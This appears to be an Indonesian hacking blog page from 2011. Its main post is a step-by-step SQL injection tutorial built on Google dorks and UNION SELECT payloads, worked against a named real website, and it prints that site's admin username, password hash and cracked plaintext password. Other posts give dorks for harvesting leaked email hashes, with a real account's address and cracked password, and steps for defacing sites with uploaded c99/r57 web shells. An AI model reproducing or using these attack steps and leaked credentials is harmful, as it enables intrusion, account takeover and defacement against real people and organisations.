Thursday, April 28, 2011

0 SQL Injection Tutorial

5:50 PM Under From -=[WorldCup]=-
[0 Comment]
SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Lebih lengkap, silakan dicari di Google Dorknya :)

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database
Credit: Madun & Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

Anda akan menemukan seperti gambar berikut:


Binus Hacker Tutorial
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
@@version,7--

Binus Hacker Tutorial

Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
group_concat(table_name),7 from information_schema.tables where table_schema=
database()--
Binus Hacker Tutorial
Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–

Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
group_concat(column_name),7 from information_schema.columns where 
table_schema=database()--
Binus Hacker Tutorial
Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:

Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,
group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,
group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:

Binus Hacker Tutorial
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682

username : comaster
password : cocoadmin4682


Selamat, anda sudah bisa login ke page dengan user & password di atas :)
Read More »

Sunday, April 24, 2011

0 Visual Basic 6 No[Full][Installer]

8:35 AM Under From -=[WorldCup]=-
[0 Comment]

[Share]Visual Basic 6[Full][Installer]

Spoiler For : Silahkan Buka
Download : Via Indowebster

Ini Visual Basic 6 FULL Tapi di Minimize Sourcenya
Jika Ada Kurangnya COMMENT Ya Mas BRO
Read More »

Saturday, April 23, 2011

0 Berbagai Cara Hack Facebook

7:37 PM Under From -=[WorldCup]=-
[0 Comment]
This summary is not available. Please click here to view the post.
Read More »

0 Hacking Email – Hotmail Yahoo Gmail

7:27 PM Under From -=[WorldCup]=-
[0 Comment]
Assalamualaikum
Ane cuma mau share tutor cupu nih,…
Cuma share aja ,…..
Berikut POC + PICT nya jadi gak ada yang protes minta POC sama PICT
Btw langsung saja ke TKP :
Hari ini ane akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita.
Persyaratan:
Google Dorks:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com
Online Hash Cracker:
http://md5crack.com/
Ok mari kita mulai:
Mari kita pergi ke http://www.google.com dan copy paste kan dork yang ane share,…..dan cari salah satu situs di sana buat korban
Hack Email Hotmail
Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash
Hack Gmail - Hacking Email
Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d
Kita buka MD5 Cracker Hash, Bisa Disini: http://md5crack.com , atau anda bisa cari di google tools untuk Crack MD5 password, banyak bertebaran.
Kemudian masukkan hashnya ke tools MD5 online Cracker, jadi seperti gambar berikut:
Hacking Yahoo EMail
Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo.com.cn
Password: 19920707
Ets, bersenang-senang dan menikmati akun tak terbatas ,…btw jgn hack email ane yahh cuma numpang share aja kok ,…
Tutor nya jga baru ane pelajari jadi jika ada yang salah maafin yoo..
Credit : badwolves1986@HN
Read More »

0 Deface Website

7:26 PM Under From -=[WorldCup]=-
[0 Comment]
Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE.. Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:
  1. Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.
  2. Setelah mendapatkan target website, silakan upload SHELL INJECT anda, kebetulan saya menggunakan tools sendiri “File Manager Binus Hacker” :) (Maaf: tidak untuk dipublikasikan) Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99: Download Shell Injection
  3. Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html
  4. Setelah itu silakan kunjungi website target anda yang sudah di Deface.
Penjelasannya detail & langkah-langkahnya:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya:
Deface Website - Website Target

2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php
Deface Website - Update Shell

3. Setelah itu kita siapkan file halaman defacement: “HACKED.html
Defacing Website - Membuat Halaman Defacement
Kemudian kita save menjadi: “HACKED.html
Defacing Website - Halaman Deface Page

4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.
Deface Website - Lokasi Home Directory Website
Upload file HACKED.html, dari local computer yang anda simpan tadi.
Deface Website - Cara Upload Page Defacement
Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:
Deface Website - Hasil Upload File Hacked Html
Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja:
Defacing Website - CHMOD file

5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya:
Defacement Website - Result
Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.
Read More »

0 Kumpulan Source Code VB_6

7:14 PM Under From -=[WorldCup]=-
[0 Comment]

[Share]Source Code Visual Basic 6

Spoiler For : Silahkan Buka
Download : Via 4Shared

Ini Source Codenya™
Jika Ada Kurangnya COMMENT Ya Mas BRO
Read More »